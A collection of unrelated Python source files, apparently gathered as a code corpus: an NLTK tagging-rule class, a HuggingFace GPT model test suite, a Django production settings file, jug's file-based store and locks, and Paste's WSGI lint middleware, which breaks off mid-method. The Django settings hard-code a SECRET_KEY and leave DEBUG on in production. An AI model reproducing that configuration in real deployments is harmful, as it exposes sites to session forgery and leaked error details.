other.__class__ == self.__class__ and
self.original_tag == other.original_tag and
self.replacement_tag == other.replacement_tag and
self._conditions == other._conditions))
def __ne__(self, other):
return not (self == other)
def __hash__(self):
# Cache our hash value (justified by profiling.)
try:
return self.__hash
except AttributeError:
self.__hash = hash(repr(self))
return self.__hash
def __repr__(self):
# Cache the repr (justified by profiling -- this is used as
# a sort key when deterministic=True.)
try:
return self.__repr
except AttributeError:
self.__repr = (
"{0}('{1}', {2}, {3}, [{4}])".format(
self.__class__.__name__,
self.templateid,
unicode_repr(self.original_tag),
unicode_repr(self.replacement_tag),
# list(self._conditions) would be simpler but will not generate
# the same Rule.__repr__ in python 2 and 3 and thus break some tests
', '.join("({0},{1})".format(f, unicode_repr(v)) for (f, v) in self._conditions)
)
)
return self.__repr
def __str__(self):
def _condition_to_logic(feature, value):
"""
Return a compact, predicate-logic styled string representation
of the given condition.
"""
return '{0}:{1}@[{2}]'.format(
feature.PROPERTY_NAME,
value,
",".join(str(w) for w in feature.positions)
)
conditions = ' & '.join([_condition_to_logic(f, v) for (f, v) in self._conditions])
s = '{0}->{1} if {2}'.format(
self.original_tag,
self.replacement_tag,
conditions
)
return s
def format(self, fmt):
"""
Return a string representation of this rule.
>>> from nltk.tbl.rule import Rule
>>> from nltk.tag.brill import Pos
>>> r = Rule("23", "VB", "NN", [(Pos([-2,-1]), 'DT')])
r.format("str") == str(r)
True
>>> r.format("str")
'VB->NN if Pos:DT@[-2,-1]'
r.format("repr") == repr(r)
True
>>> r.format("repr")
"Rule('23', 'VB', 'NN', [(Pos([-2, -1]),'DT')])"
>>> r.format("verbose")
'VB -> NN if the Pos of words i-2...i-1 is "DT"'
>>> r.format("not_found")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "nltk/tbl/rule.py", line 256, in format
raise ValueError("unknown rule format spec: {0}".format(fmt))
ValueError: unknown rule format spec: not_found
>>>
:param fmt: format specification
:type fmt: str
:return: string representation
:rtype: str
"""
if fmt == "str":
return self.__str__()
elif fmt == "repr":
return self.__repr__()
elif fmt == "verbose":
return self._verbose_format()
else:
raise ValueError("unknown rule format spec: {0}".format(fmt))
def _verbose_format(self):
"""
Return a wordy, human-readable string representation
of the given rule.
Not sure how useful this is.
"""
def condition_to_str(feature, value):
return ('the %s of %s is "%s"' %
(feature.PROPERTY_NAME, range_to_str(feature.positions), value))
def range_to_str(positions):
if len(positions) == 1:
p = positions[0]
if p == 0:
return 'this word'
if p == -1:
return 'the preceding word'
elif p == 1:
return 'the following word'
elif p < 0:
return 'word i-%d' % -p
elif p > 0:
return 'word i+%d' % p
else:
# for complete compatibility with the wordy format of nltk2
mx = max(positions)
mn = min(positions)
if mx - mn == len(positions) - 1:
return 'words i%+d...i%+d' % (mn, mx)
else:
return 'words {%s}' % (",".join("i%+d" % d for d in positions),)
replacement = '%s -> %s' % (self.original_tag, self.replacement_tag)
conditions = (' if ' if self._conditions else "") + ', and '.join(
condition_to_str(f, v) for (f, v) in self._conditions
)
return replacement + conditions
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_generation_utils import GenerationTesterMixin
from .test_modeling_common import ModelTesterMixin, ids_tensor
if is_torch_available():
import torch
from transformers import (
OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
OpenAIGPTConfig,
OpenAIGPTDoubleHeadsModel,
OpenAIGPTForSequenceClassification,
OpenAIGPTLMHeadModel,
OpenAIGPTModel,
)
class OpenAIGPTModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_token_type_ids = True
self.use_labels = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.pad_token_id = self.vocab_size - 1
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = OpenAIGPTConfig(
vocab_size=self.vocab_size,
n_embd=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
# intermediate_size=self.intermediate_size,
# hidden_act=self.hidden_act,
# hidden_dropout_prob=self.hidden_dropout_prob,
# attention_probs_dropout_prob=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
n_ctx=self.max_position_embeddings,
# type_vocab_size=self.type_vocab_size,
# initializer_range=self.initializer_range
pad_token_id=self.pad_token_id,
)
head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
return (
config,
input_ids,
head_mask,
token_type_ids,
sequence_labels,
token_labels,
choice_labels,
)
def create_and_check_openai_gpt_model(self, config, input_ids, head_mask, token_type_ids, *args):
model = OpenAIGPTModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, token_type_ids=token_type_ids, head_mask=head_mask)
result = model(input_ids, token_type_ids=token_type_ids)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_lm_head_model(self, config, input_ids, head_mask, token_type_ids, *args):
model = OpenAIGPTLMHeadModel(config)
model.to(torch_device)
model.eval()
result = model(input_ids, token_type_ids=token_type_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_double_lm_head_model(self, config, input_ids, head_mask, token_type_ids, *args):
model = OpenAIGPTDoubleHeadsModel(config)
model.to(torch_device)
model.eval()
result = model(input_ids, token_type_ids=token_type_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_openai_gpt_for_sequence_classification(
self, config, input_ids, head_mask, token_type_ids, *args
):
config.num_labels = self.num_labels
model = OpenAIGPTForSequenceClassification(config)
model.to(torch_device)
model.eval()
# print(config.num_labels, sequence_labels.size())
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
result = model(input_ids, token_type_ids=token_type_ids, labels=sequence_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
head_mask,
token_type_ids,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
inputs_dict = {
"input_ids": input_ids,
"token_type_ids": token_type_ids,
"head_mask": head_mask,
}
return config, inputs_dict
@require_torch
class OpenAIGPTModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
all_model_classes = (
(OpenAIGPTModel, OpenAIGPTLMHeadModel, OpenAIGPTDoubleHeadsModel, OpenAIGPTForSequenceClassification)
if is_torch_available()
else ()
)
all_generative_model_classes = (
(OpenAIGPTLMHeadModel,) if is_torch_available() else ()
) # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly
# special case for DoubleHeads model
def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):
inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)
if return_labels:
if model_class.__name__ == "OpenAIGPTDoubleHeadsModel":
inputs_dict["labels"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.num_choices, self.model_tester.seq_length),
dtype=torch.long,
device=torch_device,
)
inputs_dict["input_ids"] = inputs_dict["labels"]
inputs_dict["token_type_ids"] = inputs_dict["labels"]
inputs_dict["mc_token_ids"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.num_choices),
dtype=torch.long,
device=torch_device,
)
inputs_dict["mc_labels"] = torch.zeros(
self.model_tester.batch_size, dtype=torch.long, device=torch_device
)
return inputs_dict
def setUp(self):
self.model_tester = OpenAIGPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_openai_gpt_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)
def test_openai_gpt_lm_head_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_lm_head_model(*config_and_inputs)
def test_openai_gpt_double_lm_head_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_double_lm_head_model(*config_and_inputs)
def test_openai_gpt_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = OpenAIGPTModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_torch
class OPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
@slow
def test_lm_generate_openai_gpt(self):
model = OpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
model.to(torch_device)
input_ids = torch.tensor([[481, 4735, 544]], dtype=torch.long, device=torch_device) # the president is
expected_output_ids = [
481,
4735,
544,
246,
963,
870,
762,
239,
244,
40477,
244,
249,
719,
881,
487,
544,
240,
244,
603,
481,
] # the president is a very good man. " \n " i\'m sure he is, " said the
output_ids = model.generate(input_ids, do_sample=False)
self.assertListEqual(output_ids[0].tolist(), expected_output_ids)
| |
"""
Django settings for columbus project on production server.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import socket
import mimetypes
mimetypes.add_type("image/svg+xml", ".svg", True)
mimetypes.add_type("image/svg+xml", ".svgz", True)
# Webservice for Galileo. Needed only when columbus is integrated to work with galileo.
WEBSERVICE_HOST = 'http://tomcat.columbus-sandbox.tk/galileo-web-service'
SUPERVISOR_PORT = 56789
CONTAINER_SIZE_MB = 256 # 256 MB containers for any target
USER_DIRPATH = '/mnt/ldsk/'
USER_GCSPATH = '/mnt/bdsk/'
TEMP_DIRPATH = '/mnt/tdsk/'
BQ_TABLES = 'bigquery.tables'
BQ_FEATURES = 'bigquery.features'
BQ_FEATURES_SUFFIX = '::features'
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECURED_DIR = os.path.join(BASE_DIR, 'secured')
REQUIRES_DIR = os.path.join(BASE_DIR, 'requires')
# service account credentials from Google dev console for Google Earth Engine
EE_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# service account credentials from Google dev console for Google Bigquery
BQ_CREDENTIALS = os.path.join(SECURED_DIR, 'earth-outreach-bigquery.json')
# service account credentials from Google dev console for Google Cloud Storage
CS_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# service account credentials from Google dev console for Google Fusion Tables and Google Drive
FT_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# client secret to gain access to end users google drive
GD_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-client-secret.json')
# WORKERS CONFIGURATION
# file having the list of worker host names one on each line
WORKERS = [socket.getfqdn()]
# default is ~/columbus. If specified path must be fully qualified
WORKER_VIRTUAL_ENV = None
WORKER_SSH_PORT = 22
WORKER_SSH_USER = 'johnsoncharles26'
# used for password based login or as passphrase for private key file
WORKER_SSH_PASSWORD = None
# fully qualified path for the priavte key file. if not specified ~/.ssh/id_rsa is tried
WORKER_SSH_PRIVATE_KEY = None
# Scheduler Configuration
# must be one of local, remote, hybrid
PIPELINE_SCHEDULING_STRATEGY = "hybrid"
# waiting-running target ratio used only for hybrid scheduling strategy.
# Default is 1, meaning targets are sent to the same worker as long as the number
# of targets waiting is less than or equal to the number of running targets of any user
HYBRID_SCHEDULING_WR_RATIO = 1
# Cloud Storage Bucket to use for temporary file storing. The service account key specified for EE_CREDENTIALS must have
# full access to this bucket.
CS_TEMP_BUCKET = 'staging.columbus-csu.appspot.com'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Change the key to something else after deployment
SECRET_KEY = '3bg_5!omle5)+60!(qndj2!#yi+d%2oug2ydo(*^nup+9if0$k'
# Remove the following debug params after successful deployment
DEBUG = True
# TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pyedf.apps.ColumbusConfig',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'pyedf.middleware.ColumbusMiddleware',
)
ROOT_URLCONF = 'columbus.urls'
# WSGI_APPLICATION = 'columbus.wsgi.application'
# Do not forget to whitelist the ip of compute engine in cloud sql
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'database-name',
'USER': 'user-name',
'PASSWORD': 'password',
'HOST': 'mysql-ip-address',
'PORT': '3306'
}
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# static file directory inclusion
# STATICFILES_DIRS = (
# os.path.join(BASE_DIR, 'static'),
# )
# list of host names to which django server should serve. Must be specified when DEBUG = False
ALLOWED_HOSTS = ['www.columbus.cs.colostate.edu']
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + '/templates/'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Application settings
LOGIN_URL = '/login/'
LOGOUT_URL = '/login/'
# LOGIN_REDIRECT_URL = '/home'
ADMINS = [
('Johnson Kachikaran', 'jcharles@cs.colostate.edu'),
]
# Refer to configuring sendgrid using Postfix on Google Compute Engine here
# https://cloud.google.com/compute/docs/tutorials/sending-mail/using-sendgrid
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'sendgrid-username'
EMAIL_HOST_PASSWORD = 'sendgrid-password'
EMAIL_PORT = 2525
EMAIL_USE_TLS = True
EMAIL_SUBJECT_PREFIX = '[Columbus] '
EMAIL_SENDER = 'Sender Name <senders email address including angular brackets>'
MANAGERS = (
('Johnson Kachikaran', 'jcharles@cs.colostate.edu'),
)
SEND_BROKEN_LINK_EMAILS = True
# Logger settings
# dev_settings.py
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'edffile': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(BASE_DIR, 'pyedf.log'),
'maxBytes': 1024 * 1024 * 10, # 10MB
'backupCount': 10,
'formatter': 'verbose'
},
'djangofile': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(BASE_DIR, 'django.log'),
'maxBytes': 1024 * 1024 * 10, # 10MB
'backupCount': 10,
'formatter': 'verbose'
}
},
'loggers': {
'django': {
'handlers': ['djangofile'],
'propagate': True,
'level': 'ERROR',
},
'pyedf': {
'handlers': ['edffile'],
'level': 'INFO',
},
}
}
| |
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2017, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
file_store : file-system based data store & locks.
'''
import os
from os import path, mkdir
from os.path import dirname, exists
import errno
import tempfile
import shutil
from .base import base_store, base_lock
from jug.backends.encode import encode_to, decode_from
def create_directories(dname):
'''
create_directories(dname)
Recursively create directories.
'''
if dname.endswith('/'): dname = dname[:-1]
head, tail = path.split(dname)
if path.exists(dname): return
if head: create_directories(head)
try:
mkdir(dname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def fsync_dir(fname):
import errno
parent = dirname(fname)
try:
fd = os.open(parent, os.O_RDONLY)
except:
# It seems that, on Windows and related platforms (cygwin...), you
# cannot open a directory to get a file descriptor, so the call above
# raises an error.
import sys
if not sys.platform.startswith('linux'):
return
else: # On Linux, we still want to check what's wrong
raise
try:
os.fsync(fd)
except OSError as err:
if err.errno != errno.EINVAL:
raise
finally:
os.close(fd)
class file_store(base_store):
def __init__(self, dname, compress_numpy=False):
'''
file_store(dname)
Recursively create directories.
'''
if dname.endswith('/'): dname = dname[:-1]
self.jugdir = dname
self.compress_numpy = compress_numpy
def __repr__(self):
return 'file_store({})'.format(self.jugdir)
__str__ = __repr__
def create(self):
'''
Recursively create directories.
'''
create_directories(self.jugdir)
create_directories(self.tempdir())
def _maybe_create(self):
'''
Calls self.create() the first time it is called; then becomes a no-op.
'''
self.create()
self._maybe_create = (lambda : None)
def tempdir(self):
return path.join(self.jugdir, 'tempfiles')
def _getfname(self, name):
import six
if type(name) != six.text_type:
name = six.text_type(name, 'utf-8')
return path.join(self.jugdir, name[:2], name[2:])
def dump(self, object, name):
'''
store.dump(object, name)
Performs roughly the same as
pickle.dump(object, open(name,'w'))
but does it in a way that is guaranteed to be atomic even over NFS and
using compression on the disk for faster access.
'''
self._maybe_create()
name = self._getfname(name)
create_directories(dirname(name))
fd, fname = tempfile.mkstemp('.jugtmp', 'jugtemp', self.tempdir())
output = os.fdopen(fd, 'wb')
try:
import numpy as np
if not self.compress_numpy and type(object) == np.ndarray:
np.lib.format.write_array(output, object)
output.flush()
os.fsync(output.fileno())
output.close()
fsync_dir(fname)
os.rename(fname, name)
return
except ImportError:
pass
except OSError:
pass
except ValueError:
pass
encode_to(object, output)
output.flush()
os.fsync(output.fileno())
output.close()
# Rename is atomic even over NFS.
fsync_dir(fname)
os.rename(fname, name)
def list(self):
'''
keys = store.list()
Returns a list of all the keys in the store
'''
if not exists(self.jugdir):
return []
keys = []
for d in os.listdir(self.jugdir):
if len(d) == 2:
for f in os.listdir(path.join(self.jugdir, d)):
keys.append((d+f).encode('ascii'))
return keys
def listlocks(self):
'''
keys = store.listlocks()
Returns a list of all the locks in the store
This is an unsafe function as the results may be outdated by the time
the function returns.
'''
if not exists(path.join(self.jugdir, 'locks')):
return []
keys = []
for k in os.listdir(path.join(self.jugdir, 'locks')):
keys.append(k[:-len('.lock')].encode('ascii'))
return keys
def can_load(self, name):
'''
can = store.can_load(name)
'''
fname = self._getfname(name)
return exists(fname)
def load(self, name):
'''
obj = store.load(name)
Loads the objects. Equivalent to pickle.load(), but a bit smarter at
times.
Parameters
----------
name : str
Key to use
Returns
-------
obj : any
The object that was saved under ``name``
'''
fname = self._getfname(name)
input = open(fname, 'rb')
try:
import numpy as np
return np.lib.format.read_array(input)
except ValueError:
input.seek(0)
except ImportError:
pass
return decode_from(input)
def remove(self, name):
'''
was_removed = store.remove(name)
Remove the entry associated with name.
Returns whether any entry was actually removed.
'''
try:
fname = self._getfname(name)
os.unlink(fname)
return True
except OSError:
return False
def cleanup(self, active, keeplocks=False):
'''
nr_removed = store.cleanup(active, keeplocks)
Implement 'cleanup' command
Parameters
----------
active : sequence
files *not to remove*
keeplocks : boolean
whether to preserve or remove locks
Returns
-------
nr_removed : integer
number of removed files
'''
active = frozenset(self._getfname(t.hash()) for t in active)
removed = 0
for dir,_,fs in os.walk(self.jugdir):
if keeplocks and dir == "locks":
continue
for f in fs:
f = path.join(dir, f)
if f not in active:
os.unlink(f)
removed += 1
return removed
def remove_locks(self):
'''
removed = store.remove_locks()
Remove all locks
Returns
-------
removed : int
Number of locks removed
'''
lockdir = path.join(self.jugdir, 'locks')
if not exists(lockdir): return 0
removed = 0
for f in os.listdir(lockdir):
os.unlink(path.join(lockdir, f))
removed += 1
return removed
def getlock(self, name):
'''
lock = store.getlock(name)
Retrieve a lock object associated with ``name``.
Parameters
----------
name : str
Key
Returns
-------
lock : Lock object
This is a file_lock object
'''
return file_based_lock(self.jugdir, name)
def close(self):
'''
store.close()
Has no effect on file based stores.
'''
pass
def metadata(self, t):
'''
meta = store.metadata(t)
Retrieves information on the state of the computation
Parameters
----------
t : Task
A Task object
Returns
-------
meta : dict
Dictionary describing the state of the computation
'''
from os import stat, path
from time import ctime
fname = self._getfname(t.hash())
if path.exists(fname):
st = stat(fname)
return {
'computed': True,
'completed': ctime(st.st_mtime),
}
return {
'computed': False
}
@staticmethod
def remove_store(jugdir):
'''
file_store.remove_store(jugdir)
Removes from disk all the files associated with this jugdir.
'''
if path.exists(jugdir):
shutil.rmtree(jugdir)
class file_based_lock(base_lock):
'''
file_based_lock: File-system based locks
Functions:
----------
- get(): acquire the lock
- release(): release the lock
- is_locked(): check lock state
'''
def __init__(self, jugdir, name):
import six
if type(name) != six.text_type:
name = six.text_type(name, 'utf-8')
self.fullname = path.join(jugdir, 'locks', '{0}.lock'.format(name))
def get(self):
'''
lock.get()
Create a lock for name in an NFS compatible way.
Parameters
----------
None
Returns
-------
locked : bool
Whether the lock was created
'''
if exists(self.fullname): return False
create_directories(path.dirname(self.fullname))
try:
import socket
from datetime import datetime
fd = os.open(self.fullname, os.O_RDWR|os.O_CREAT|os.O_EXCL)
F = os.fdopen(fd, 'w')
F.write('PID {0} on HOSTNAME {1}\n'.format(os.getpid(), socket.gethostname()))
F.write('Lock created on {0}\n'.format(datetime.now().strftime('%Y-%m-%d (%Hh%M.%S)')))
F.close()
return True
except OSError:
return False
def release(self):
'''
lock.release()
Removes lock
'''
try:
os.unlink(self.fullname)
except OSError:
pass
def is_locked(self):
'''
locked = lock.is_locked()
Returns whether a lock exists for name. Note that the answer can
be invalid by the time this function returns. Only by trying to
acquire the lock can you avoid race-conditions. See the get() function.
'''
return path.exists(self.fullname)
| |
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Also licenced under the Apache License, 2.0: http://opensource.org/licenses/apache2.0.php
# Licensed to PSF under a Contributor Agreement
"""
Middleware to check for obedience to the WSGI specification.
Some of the things this checks:
* Signature of the application and start_response (including that
keyword arguments are not used).
* Environment checks:
- Environment is a dictionary (and not a subclass).
- That all the required keys are in the environment: REQUEST_METHOD,
SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors,
wsgi.multithread, wsgi.multiprocess, wsgi.run_once
- That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the
environment (these headers should appear as CONTENT_LENGTH and
CONTENT_TYPE).
- Warns if QUERY_STRING is missing, as the cgi module acts
unpredictably in that case.
- That CGI-style variables (that don't contain a .) have
(non-unicode) string values
- That wsgi.version is a tuple
- That wsgi.url_scheme is 'http' or 'https' (@@: is this too
restrictive?)
- Warns if the REQUEST_METHOD is not known (@@: probably too
restrictive).
- That SCRIPT_NAME and PATH_INFO are empty or start with /
- That at least one of SCRIPT_NAME or PATH_INFO are set.
- That CONTENT_LENGTH is a positive integer.
- That SCRIPT_NAME is not '/' (it should be '', and PATH_INFO should
be '/').
- That wsgi.input has the methods read, readline, readlines, and
__iter__
- That wsgi.errors has the methods flush, write, writelines
* The status is a string, contains a space, starts with an integer,
and that integer is in range (> 100).
* That the headers is a list (not a subclass, not another kind of
sequence).
* That the items of the headers are tuples of strings.
* That there is no 'status' header (that is used in CGI, but not in
WSGI).
* That the headers don't contain newlines or colons, end in _ or -, or
contain characters codes below 037.
* That Content-Type is given if there is content (CGI often has a
default content type, but WSGI does not).
* That no Content-Type is given when there is no content (@@: is this
too restrictive?)
* That the exc_info argument to start_response is a tuple or None.
* That all calls to the writer are with strings, and no other methods
on the writer are accessed.
* That wsgi.input is used properly:
- .read() is called with zero or one argument
- That it returns a string
- That readline, readlines, and __iter__ return strings
- That .close() is not called
- No other methods are provided
* That wsgi.errors is used properly:
- .write() and .writelines() is called with a string
- That .close() is not called, and no other methods are provided.
* The response iterator:
- That it is not a string (it should be a list of a single string; a
string will work, but perform horribly).
- That .next() returns a string
- That the iterator is not iterated over until start_response has
been called (that can signal either a server or application
error).
- That .close() is called (doesn't raise exception, only prints to
sys.stderr, because we only know it isn't called when the object
is garbage collected).
"""
import re
import sys
from types import DictType, StringType, TupleType, ListType
import warnings
header_re = re.compile(r'^[a-zA-Z][a-zA-Z0-9\-_]*$')
bad_header_value_re = re.compile(r'[\000-\037]')
class WSGIWarning(Warning):
"""
Raised in response to WSGI-spec-related warnings
"""
def middleware(application, global_conf=None):
"""
When applied between a WSGI server and a WSGI application, this
middleware will check for WSGI compliancy on a number of levels.
This middleware does not modify the request or response in any
way, but will throw an AssertionError if anything seems off
(except for a failure to close the application iterator, which
will be printed to stderr -- there's no way to throw an exception
at that point).
"""
def lint_app(*args, **kw):
assert len(args) == 2, "Two arguments required"
assert not kw, "No keyword arguments allowed"
environ, start_response = args
check_environ(environ)
# We use this to check if the application returns without
# calling start_response:
start_response_started = []
def start_response_wrapper(*args, **kw):
assert len(args) == 2 or len(args) == 3, (
"Invalid number of arguments: %s" % args)
assert not kw, "No keyword arguments allowed"
status = args[0]
headers = args[1]
if len(args) == 3:
exc_info = args[2]
else:
exc_info = None
check_status(status)
check_headers(headers)
check_content_type(status, headers)
check_exc_info(exc_info)
start_response_started.append(None)
return WriteWrapper(start_response(*args))
environ['wsgi.input'] = InputWrapper(environ['wsgi.input'])
environ['wsgi.errors'] = ErrorWrapper(environ['wsgi.errors'])
iterator = application(environ, start_response_wrapper)
assert iterator is not None and iterator != False, (
"The application must return an iterator, if only an empty list")
check_iterator(iterator)
return IteratorWrapper(iterator, start_response_started)
return lint_app
class InputWrapper(object):
def __init__(self, wsgi_input):
self.input = wsgi_input
def read(self, *args):
assert len(args) <= 1
v = self.input.read(*args)
assert type(v) is type("")
return v
def readline(self, *args):
v = self.input.readline(*args)
assert type(v) is type("")
return v
def readlines(self, *args):
assert len(args) <= 1
lines = self.input.readlines(*args)
assert type(lines) is type([])
for line in lines:
assert type(line) is type("")
return lines
def __iter__(self):
while 1:
line = self.readline()
if not line:
return
yield line
def close(self):
assert 0, "input.close() must not be called"
class ErrorWrapper(object):
def __init__(self, wsgi_errors):
self.errors = wsgi_errors
def write(self, s):
assert type(s) is type("")
self.errors.write(s)
def flush(self):
self.errors.flush()
def writelines(self, seq):
for line in seq:
self.write(line)
def close(self):
assert 0, "errors.close() must not be called"
class WriteWrapper(object):
def __init__(self, wsgi_writer):
self.writer = wsgi_writer
def __call__(self, s):
assert type(s) is type("")
self.writer(s)
class PartialIteratorWrapper(object):
def __init__(self, wsgi_iterator):
self.iterator = wsgi_iterator
def __iter__(self):
# We want to make sure __iter__ is called
return IteratorWrapper(self.iterator)
class IteratorWrapper(object):
def __init__(self, wsgi_iterator, check_start_response):
self.original_iterator = wsgi_iterator
self.iterator = iter(wsgi_iterator)
self.closed = False
self.check_start_response = check_start_response
def __iter__(self):
return self
def next(self):
assert not self.closed, (
"Iterator read after closed")
v = self.iterator.next()
if self.check_start_response is not None:
assert self.check_start_response, (
"The application returns and we started iterating over its body, but start_response has not yet been called")
self.check_start_response = None
return v
def close(self):
self.closed = True
if hasattr(self.original_iterator, 'close'):
